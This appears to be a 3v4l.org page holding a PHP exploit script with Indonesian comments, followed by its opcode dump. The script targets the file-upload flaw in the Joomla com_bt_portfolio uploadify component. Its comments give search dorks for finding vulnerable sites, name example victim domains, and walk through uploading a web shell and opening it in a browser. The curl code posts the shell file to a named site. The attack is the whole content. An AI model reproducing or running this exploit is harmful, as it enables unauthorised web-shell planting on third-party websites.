3v4l.org

run code in 300+ PHP versions simultaneously
<?php # Exploit uploadify pada component Joomla com_bt_portfolio # Exploit ini sama dengan exploit uploadify pada umumnya, yang berbeda cuma url exploitnya.. # Shell yang kamu upload (dalam kasus ini saya beri nama set.php) harus 1 direktori dengan uploader ini. # Save script ini dengan ekstensi php, kemudian kamu tinggal jalankan di terminal (Linux) atau CMD (Windows) # Dork yang bisa kamu gunakan adalah "templates/bt_foto" & "/templates/bt_metro" # Misalkan situsnya seperti ini => http://greenclaws.co.uk/templates/bt_foto/ # Kamu tinggal ubah saja menjadi => http://greenclaws.co.uk/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php # Setelah itu kamu masukkan ke dalam script ini dan langsung aja eksekusi di terminal atau cmd # Kamu jalankan dengan perintah => php namafileini.php # Jika berhasil, maka akan muncul path shellnya seperti gambar berikut ini: http://i.imgur.com/Vrkdqzf.png # Kalau sudah seperti ini tinggal kamu buka di browser urlnya menjadi => http://greenclaws.co.uk/administrator/components/com_bt_portfolio/set.php # # # Spesial for Indonesian Cyber Army dan orang-orang yang menganggapku teman ^_^ $uploadfile="007.php"; $ch =curl_init("shinokun.org/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile",'folder'=>"/administrator/components/com_bt_portfolio/")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?>
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/Y3WKP
function name:  (null)
number of ops:  37
compiled vars:  !0 = $uploadfile, !1 = $ch, !2 = $postResult
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   20     0  E >   ASSIGN                                                   !0, '007.php'
   21     1        INIT_FCALL_BY_NAME                                       'curl_init'
          2        SEND_VAL_EX                                              'shinokun.org%2Fadministrator%2Fcomponents%2Fcom_bt_portfolio%2Fhelpers%2Fuploadify%2Fuploadify.php'
          3        DO_FCALL                                      0  $4      
          4        ASSIGN                                                   !1, $4
   22     5        INIT_FCALL_BY_NAME                                       'curl_setopt'
          6        SEND_VAR_EX                                              !1
          7        FETCH_CONSTANT                                   ~6      'CURLOPT_POST'
          8        SEND_VAL_EX                                              ~6
          9        SEND_VAL_EX                                              <true>
         10        DO_FCALL                                      0          
   23    11        INIT_FCALL_BY_NAME                                       'curl_setopt'
         12        SEND_VAR_EX                                              !1
         13        FETCH_CONSTANT                                   ~8      'CURLOPT_POSTFIELDS'
         14        SEND_VAL_EX                                              ~8
   24    15        NOP                                                      
         16        FAST_CONCAT                                      ~9      '%40', !0
         17        INIT_ARRAY                                       ~10     ~9, 'Filedata'
         18        ADD_ARRAY_ELEMENT                                ~10     '%2Fadministrator%2Fcomponents%2Fcom_bt_portfolio%2F', 'folder'
         19        SEND_VAL_EX                                              ~10
         20        DO_FCALL                                      0          
   25    21        INIT_FCALL_BY_NAME                                       'curl_setopt'
         22        SEND_VAR_EX                                              !1
         23        FETCH_CONSTANT                                   ~12     'CURLOPT_RETURNTRANSFER'
         24        SEND_VAL_EX                                              ~12
         25        SEND_VAL_EX                                              1
         26        DO_FCALL                                      0          
   26    27        INIT_FCALL_BY_NAME                                       'curl_exec'
         28        SEND_VAR_EX                                              !1
         29        DO_FCALL                                      0  $14     
         30        ASSIGN                                                   !2, $14
   27    31        INIT_FCALL_BY_NAME                                       'curl_close'
         32        SEND_VAR_EX                                              !1
         33        DO_FCALL                                      0          
   28    34        CAST                                          6  ~17     !2
         35        ECHO                                                     ~17
   29    36      > RETURN                                                   1

Generated using Vulcan Logic Dumper, using php 8.0.0

preferences:
143.58 ms | 1395 KiB | 13 Q